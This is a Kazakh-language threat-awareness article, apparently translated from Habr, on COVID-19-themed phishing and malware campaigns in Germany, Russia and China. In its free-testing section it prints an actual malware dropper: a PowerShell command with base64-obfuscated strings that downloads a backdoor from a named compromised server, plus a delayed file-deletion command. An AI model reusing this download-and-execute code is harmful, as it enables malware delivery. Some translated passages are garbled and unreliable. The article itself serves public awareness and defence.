Шабуылшылар COVID-19 тақырыбын пайдалануды жалғастыруда, бұл эпидемияға қатысты барлық нәрсеге қызығушылық танытатын пайдаланушылар үшін көбірек қауіп төндіреді. IN Біз коронавирустан кейінгі зиянды бағдарламалардың қандай түрлері пайда болғаны туралы айттық, ал бүгін әртүрлі елдердегі, соның ішінде Ресейдегі пайдаланушылар кездескен әлеуметтік инженерия әдістері туралы сөйлесетін боламыз. Жалпы тенденциялар мен мысалдар қысқартылған.
Есіңізде болсын Біз адамдар тек коронавирус пен індеттің барысы туралы ғана емес, сонымен қатар қаржылық қолдау шаралары туралы да оқуға дайын екендігі туралы айттық? Міне, жақсы мысал. Германияның Солтүстік Рейн-Вестфалия штатында немесе НРВ штатында қызықты фишингтік шабуыл анықталды. Шабуылшылар Экономика министрлігінің сайтының көшірмелерін жасаған (), мұнда кез келген адам қаржылық көмекке жүгіне алады. Мұндай бағдарлама шын мәнінде бар және ол алаяқтар үшін тиімді болып шықты. Зардап шеккендердің жеке деректерін алған олар министрліктің сайтында өтініш жазып, басқа банктік деректемелерді көрсеткен. Ресми мәлімет бойынша, схема анықталғанға дейін осындай 4 мың жалған өтініш жасалған. Нәтижесінде зардап шеккен азаматтарға арналған 109 миллион доллар алаяқтардың қолына түсті.
COVID-19 тегін тестілеуді қалайсыз ба?
Коронавирустық тақырыптағы фишингтің тағы бір маңызды мысалы болды электрондық пошталарда. Хабарламалар қолданушылардың назарын коронавирустық инфекцияға тегін тестілеуден өту ұсынысымен аударды. Осылардың қосымшасында Trickbot/Qakbot/Qbot даналары болды. Ал денсаулығын тексергісі келетіндер «қоса берілген форманы толтыра» бастағанда, компьютерге зиянды сценарий жүктелген. Ал құмсалғышты тестілеуден аулақ болу үшін сценарий негізгі вирусты біраз уақыттан кейін жүктей бастады, қорғаныс жүйелері ешқандай зиянды әрекет болмайтынына сенімді болды.
Көптеген пайдаланушыларды макростарды қосуға сендіру де оңай болды. Ол үшін стандартты трюк қолданылды: сауалнаманы толтыру үшін алдымен макростарды қосу керек, яғни VBA сценарийін іске қосу керек.
Көріп отырғаныңыздай, VBA сценарийі антивирустардан арнайы маскаланған.
Windows жүйесінде күту мүмкіндігі бар, онда қолданба әдепкі «Иә» жауабын қабылдағанға дейін /T <секунд> күтеді. Біздің жағдайда сценарий уақытша файлдарды жоймас бұрын 65 секунд күтті:
cmd.exe /C choice /C Y /N /D Y /T 65 & Del C:UsersPublictmpdirtmps1.bat & del C:UsersPublic1.txt
Күту кезінде зиянды бағдарлама жүктелді. Бұл үшін арнайы PowerShell сценарийі іске қосылды:
cmd /C powershell -Command ""(New-Object Net.WebClient).DownloadFile([System.Text.Encoding]::ASCII.GetString([System.Convert]: :FromBase64String('aHR0cDovL2F1dG9tYXRpc2NoZXItc3RhdWJzYXVnZXIuY29tL2ZlYXR1cmUvNzc3Nzc3LnBuZw==')), [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('QzpcVXNlcnNcUHVibGljXHRtcGRpclxmaWxl')) + '1' + '.e' + 'x' + 'e') >C:UsersPublic1.txt
Base64 мәнін декодтаудан кейін PowerShell сценарийі Германиядан бұрын бұзылған веб-серверде орналасқан бэкдорды жүктейді:
http://automatischer-staubsauger.com/feature/777777.pngжәне оны келесі атаумен сақтайды:
C:UsersPublictmpdirfile1.exe
папка ‘C:UsersPublictmpdir’ пәрмені бар "tmps1.bat" файлын іске қосқан кезде жойылады cmd /c mkdir ""C:UsersPublictmpdir"".
Мемлекеттік органдарға мақсатты шабуыл
Сонымен қатар, жақында FireEye сарапшылары Уханьдағы үкіметтік құрылымдарға, сондай-ақ Қытайдың Төтенше жағдайлар министрлігіне бағытталған мақсатты APT32 шабуылы туралы хабарлады. Таратылған RTF файлдарының бірінде New York Times мақаласына сілтеме бар . Дегенмен, оны оқығаннан кейін зиянды бағдарлама жүктелді (FireEye талдаушылары дананы METALJACK деп анықтады).
Бір қызығы, анықтау кезінде антивирустардың ешқайсысы бұл дананы анықтаған жоқ, деп хабарлайды Virustotal.
Ресми веб-сайттар жұмыс істемей тұрғанда
Фишингтік шабуылдың ең жарқын мысалы Ресейде өткен күні болды. Бұған 3 пен 16 жас аралығындағы балаларға көптен күткен жәрдемақының тағайындалуы себеп болды. 12 жылдың 2020 мамырында өтініштерді қабылдау басталғаны туралы хабарланғанда, миллиондаған адамдар көптен күткен көмекті алу үшін Мемлекеттік қызметтер веб-сайтына жүгіріп, порталды кәсіби DDoS-шабуылынан да жаман етпеді. Президент «Мемлекеттік қызметтер өтініштер ағынына төтеп бере алмайды» дегенде, адамдар онлайн режимінде өтініштерді қабылдаудың балама сайтының іске қосылуы туралы айта бастады.
Мәселе мынада, бірнеше сайт бірден жұмыс істей бастады, ал біреуі, posobie16.gosuslugi.ru сайтындағы нақты, іс жүзінде қосымшаларды қабылдайды, басқалары. .
SearchInform әріптестері .ru аймағында 30-ға жуық жаңа алаяқтық домендерді тапты. Infosecurity және Softline компаниясы сәуір айының басынан бері 70-тен астам осындай жалған мемлекеттік қызмет веб-сайттарын бақылаған. Оларды жасаушылар таныс символдарды манипуляциялайды, сонымен қатар gosuslugi, gosuslugi-16, vyplaty, covid-vyplaty, posobie және т.б. сөздердің тіркесімін пайдаланады.
Хайп және әлеуметтік инженерия
Барлық осы мысалдар шабуылдаушылардың коронавирус тақырыбын сәтті монетизациялап жатқанын растайды. Әлеуметтік шиеленіс және түсініксіз мәселелер неғұрлым жоғары болса, алаяқтардың маңызды деректерді ұрлау, адамдарды өз ақшасынан өз бетінше бас тартуға мәжбүрлеу немесе жай ғана көбірек компьютерлерді бұзу мүмкіндігі артады.
Пандемия әлеуетті дайын емес адамдарды үйден жаппай жұмыс істеуге мәжбүр еткенін ескерсек, жеке ғана емес, корпоративтік деректерге де қауіп төніп тұр. Мысалы, жақында Microsoft 365 (бұрынғы Office 365) пайдаланушылары да фишинг шабуылына ұшырады. Адамдар хаттарға қосымша ретінде жаппай «жіберілген» дауыстық хабарламаларды алды. Дегенмен, файлдар шын мәнінде шабуыл құрбандарын жіберген HTML беті болды . Нәтижесінде қол жеткізуді жоғалту және есептік жазбадағы барлық деректердің бұзылуы.
Ақпарат көзі: www.habr.com